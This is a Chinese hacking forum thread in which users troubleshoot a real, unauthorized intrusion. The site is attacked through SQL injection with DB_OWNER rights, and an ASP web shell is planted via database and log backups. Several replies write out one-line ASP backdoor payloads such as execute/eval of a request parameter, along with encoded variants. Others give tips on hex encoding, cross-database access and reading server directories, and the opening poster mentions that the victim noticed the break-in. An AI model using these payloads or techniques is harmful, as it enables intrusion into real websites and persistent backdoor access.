‹‹ 上一主题 | 下一主题 ››
 35 12
发新话题
打印

[讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接

yyb1813

晶莹剔透§烈日灼然

Rank: 1

帖子
73 
精华
0 
积分
218 
阅读权限
40 
在线时间
54 小时 
注册时间
2006-1-19 
最后登录
2008-12-27 
楼主 发表于 2006-7-27 23:17  只看该作者

[讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接

议题作者:Yyb1813
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

经过几小时的测试,依然没办法将站拿下传马不成功。

使用软件nbsi3.0找到注入点,权限为:DB_OWNER,知用户名不知密码,拿到数据库:tv_Data

使用nbsi3.0查找目录却无法查到网站目录,应而使用明小子猜到同一服务器下的一目录为:e:\web\mpo\此站点支持asp 并且网站为: http://www.***.com/ 可以打开。


使用nbsi3.0自带的Getwebshell却无法将文件写入e:\web\mpo\001.asp
查看发现001.asp写不进去。

使用GetWebshellah56bug大众版.也不行。

最后使用:xiaolu写的Getwebshell提交后将文件成功写入。查看:e:\web\mpo\001.asp
存在。

打开对应网站:http://www.***.com/ 001.asp提示如下:

Microsoft VBScript 编译器错误 错误 '800a0408'

无效字符

/001.asp,行 4338

I?扴?

=============为什么会这样???
我用一句话修改去连接无效。用蓝屏一句话连接也无效,修改xiaolu写的Getwebshell为蓝屏等的连接:<%execute request("l")%>
多种方法还是没办法成功,连接不上。

我要如何做了。搞了一天没解决。

[s:92]

TOP

first_0

晶莹剔透§烈日灼然

Rank: 1

帖子
12 
精华
0 
积分
64 
阅读权限
40 
在线时间
0 小时 
注册时间
2005-2-22 
最后登录
2007-11-29 
沙发 发表于 2006-7-31 15:23  只看该作者
数据库不干净,有权限的话,换个数据库备

TOP

virus-y2k

晶莹剔透§烈日灼然

Rank: 1

帖子
42 
精华
0 
积分
149 
阅读权限
40 
性别
男 
在线时间
7 小时 
注册时间
2006-3-24 
最后登录
2008-10-5 
椅子 发表于 2006-7-31 17:18  只看该作者
这个简单。。用臭要饭的webshell导入大法吧~

TOP

安静

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
19 
阅读权限
40 
在线时间
9 小时 
注册时间
2005-7-6 
最后登录
2007-3-22 
板凳 发表于 2006-7-31 21:21  只看该作者
手工log备份比较好~
最好是用16进制

TOP

hack520

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1082 
精华
6 
积分
5594 
阅读权限
150 
性别
男 
在线时间
579 小时 
注册时间
2005-3-18 
最后登录
2008-8-31 
地板 发表于 2006-8-1 02:56  只看该作者
[s:75] 没插进去~~~~到insert那步出错了...建议换个库插插插 [s:82]
Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注:此账号密码已更改,请本人与冰血联系修改密码。

TOP

yyb1813

晶莹剔透§烈日灼然

Rank: 1

帖子
73 
精华
0 
积分
218 
阅读权限
40 
在线时间
54 小时 
注册时间
2006-1-19 
最后登录
2008-12-27 
6楼 发表于 2006-8-1 08:34  只看该作者
引用:
这里是引用第[5 楼]hack5202006-08-01 02:56发表的:
[s:75] 没插进去~~~~到insert那步出错了...建议换个库插插插 [s:82]
猪三哥啊,我天天在啃你的注入,都没搞掂,现在这个飞了。
呵呵。这是宁波的服务器,现在给他发现了,什么权限都没有了,什么文件夹都设成只读了,哎,没了没了!

TOP

kuangzhu

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
2 小时 
注册时间
2005-11-1 
最后登录
2007-1-5 
7楼 发表于 2006-8-16 05:03  只看该作者
换冰狐的那个小马插然后用一句话客户连也可以我试过

TOP

神無月

晶莹剔透§烈日灼然

Rank: 1

帖子
124 
精华
0 
积分
313 
阅读权限
40 
性别
男 
在线时间
37 小时 
注册时间
2006-4-22 
最后登录
2008-6-9 
8楼 发表于 2006-8-16 12:48  只看该作者
用EVAL吧
不行就试试转换一下一句马
<%execute(request("l"))%>
<%%25execute(request("l"))%%25>都试试吧。~

TOP

remax

晶莹剔透§烈日灼然

Rank: 1

帖子
324 
精华
2 
积分
907 
阅读权限
50 
在线时间
79 小时 
注册时间
2005-10-25 
最后登录
2008-7-13 
9楼 发表于 2006-8-16 21:06  只看该作者
估计是数据库里有%,反正出不来~。~
20字节够写什么?

TOP

唐不狐

很黃很暴力

晶莹剔透§烈日灼然

Rank: 1

帖子
149 
精华
2 
积分
583 
阅读权限
50 
性别
男 
来自
china 
在线时间
109 小时 
注册时间
2005-9-27 
最后登录
2008-11-7 
10楼 发表于 2006-8-16 22:10  只看该作者
遇到过
1 重新寻找注射点,目的是换库。这点注射工具可检测出
2 多次备份。还是用导出日志大法比较好,备份出来的文件大小都比较理想

TOP

popo0421

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
30 
阅读权限
40 
性别
男 
在线时间
0 小时 
注册时间
2006-1-9 
最后登录
2008-2-4 
11楼 发表于 2006-8-19 07:13  只看该作者
可能是服务器的asp 过滤了一些东西,换个注入点再试试,
找不同目录下的asp , 应该可以找出不同数据库的可用注入点

TOP

独孤依人

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
307 
精华
12 
积分
3997 
阅读权限
100 
性别
男 
在线时间
918 小时 
注册时间
2006-4-22 
最后登录
2009-1-9 
12楼 发表于 2006-8-19 18:46  只看该作者
可能你备份的目录没有写入权限
We are not the only ones,but we will try to be the best!

TOP

--------

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
10 
阅读权限
40 
在线时间
66 小时 
注册时间
2006-7-27 
最后登录
2008-6-6 
13楼 发表于 2006-9-14 22:15  只看该作者
Sql db_owner权限注入成功之后,
通过读取注册表拿web路径,但没权限,读取失败.
现在改用xp_redtree过程读取硬盘目录,能读取,并且保存在test表中,
通过openrowset远程insert失败,提示连接失败(我自己计算机能连,它不能连,应该不是外部数据库问题吧).

想请教的是:现在如何读取test表的所有内容?
我想过用猜解,但是怕慢.

有人有更好方法吗

TOP

asm

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1674 
精华
31 
积分
9626 
阅读权限
150 
性别
男 
在线时间
984 小时 
注册时间
2006-9-21 
最后登录
2009-1-7 
14楼 发表于 2006-9-23 18:52  只看该作者
如果是要入侵,那就换别的方法,别吊死在一棵树上

如果是解决这个问题,我建议你去查查关于asp的错误号,估计会有眉目...
游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn

TOP

r00t

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
12 
阅读权限
40 
在线时间
0 小时 
注册时间
2006-7-11 
最后登录
2008-9-10 
15楼 发表于 2006-9-26 04:22  只看该作者
如果找到库的位置,手动LOG备份吧,就象楼楼上的最好用16进制的。

TOP

tlhelen

晶莹剔透§烈日灼然

Rank: 1

帖子
19 
精华
0 
积分
57 
阅读权限
40 
在线时间
51 小时 
注册时间
2005-10-18 
最后登录
2008-3-24 
16楼 发表于 2006-9-28 09:19  只看该作者
一句话木马成功依赖于两个条件:
1、服务端没有禁止adodb.Stream或FSO组件
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

TOP

xg530

晶莹剔透§烈日灼然

Rank: 1

帖子
16 
精华
0 
积分
51 
阅读权限
40 
在线时间
44 小时 
注册时间
2005-8-30 
最后登录
2008-3-28 
17楼 发表于 2006-11-21 13:57  只看该作者
谁有aspx的一句话啊`找了好长时间没找到了```郁闷死`

TOP

justcrack

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
40 
精华
0 
积分
196804 
阅读权限
100 
在线时间
86 小时 
注册时间
2006-2-2 
最后登录
2008-2-21 
18楼 发表于 2006-11-22 07:36  只看该作者
引用:
引用第10楼唐不狐2006-08-16 22:10发表的:
遇到过
1 重新寻找注射点,目的是换库。这点注射工具可检测出
2 多次备份。还是用导出日志大法比较好,备份出来的文件大小都比较理想
如果有其他库权限直接跨库就可以了。
个人认为一个站多个数据库又有多个注射点对应不同库的几率不如一个用户多个库的权限的几率大。
广告位招租。

TOP

freedom

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
23 
阅读权限
40 
性别
男 
在线时间
46 小时 
注册时间
2005-8-4 
最后登录
2008-7-20 
19楼 发表于 2006-12-19 11:45  只看该作者
换成这样试试<%eval(request("l"))%>。或改变为十六进制。
顺便借此宝地问一下DB_OWNER权限下怎样用SQL语句暴出网站路径
努力就会成功

TOP

jxsaqjh

晶莹剔透§烈日灼然

Rank: 1

帖子
36 
精华
0 
积分
99 
阅读权限
40 
性别
男 
在线时间
16 小时 
注册时间
2006-10-23 
最后登录
2008-12-22 
20楼 发表于 2006-12-30 20:53  只看该作者
我也遇到过,一句已经写入成功,可是旧在上船木马的时候不成功。。
或者是提示上船成功,可是连接出现404,或者干脆旧不能上船
jxsaqjh.cn

TOP

qmttz

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
12 小时 
注册时间
2006-6-10 
最后登录
2008-12-4 
21楼 发表于 2007-5-24 22:58  只看该作者
鄙人,把各种一句话服务端试过以后,再用NBSI插入,木马成功执行。

但鄙人并不知道原因,还请高手赐教。

TOP

hitlerboy

晶莹剔透§烈日灼然

Rank: 1

帖子
79 
精华
0 
积分
274 
阅读权限
40 
性别
男 
在线时间
182 小时 
注册时间
2006-5-7 
最后登录
2008-4-11 
22楼 发表于 2007-5-24 23:34  只看该作者
曾经遇到跟楼主一样的情况,
一句话插入,生成的asp文件,访问存在,就是链接不了。
错误号没看,也许不一样。
然后尝试log备份,直接失败。

TOP

lalayyj123

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
21 
阅读权限
40 
在线时间
4 小时 
注册时间
2007-5-24 
最后登录
2007-5-27 
23楼 发表于 2007-5-25 09:26  只看该作者
关于手工LOG备分,每一步返回的页面都正常,可惜还是找不到备分的文件。还有,我下载了几个NBSI,都检查不出漏洞,而啊D却可以,是NBSI的版本问题吗?

TOP

zp260

晶莹剔透§烈日灼然

Rank: 1

帖子
13 
精华
0 
积分
25 
阅读权限
40 
在线时间
21 小时 
注册时间
2007-4-11 
最后登录
2008-6-23 
24楼 发表于 2007-5-25 10:29  只看该作者
我也遇到这样的情况真麻烦啊。。。多换换工具,代码也换成16进制,或者把符号都转义下试把。。多一种路子多一个成功的机会了

TOP

xln28118

晶莹剔透§烈日灼然

Rank: 1

帖子
43 
精华
0 
积分
136 
阅读权限
40 
在线时间
57 小时 
注册时间
2006-4-15 
最后登录
2009-1-8 
25楼 发表于 2007-5-25 12:18  只看该作者
最近搞了个站也是一句话已经上去了 。能看目录 。但是就是不能传东西 一传东西就404错误,就算建立个普通文本也不行 。有个传上去了就是乱码 。#·!

TOP

‹‹ 上一主题 | 下一主题 ››
 35 12
发新话题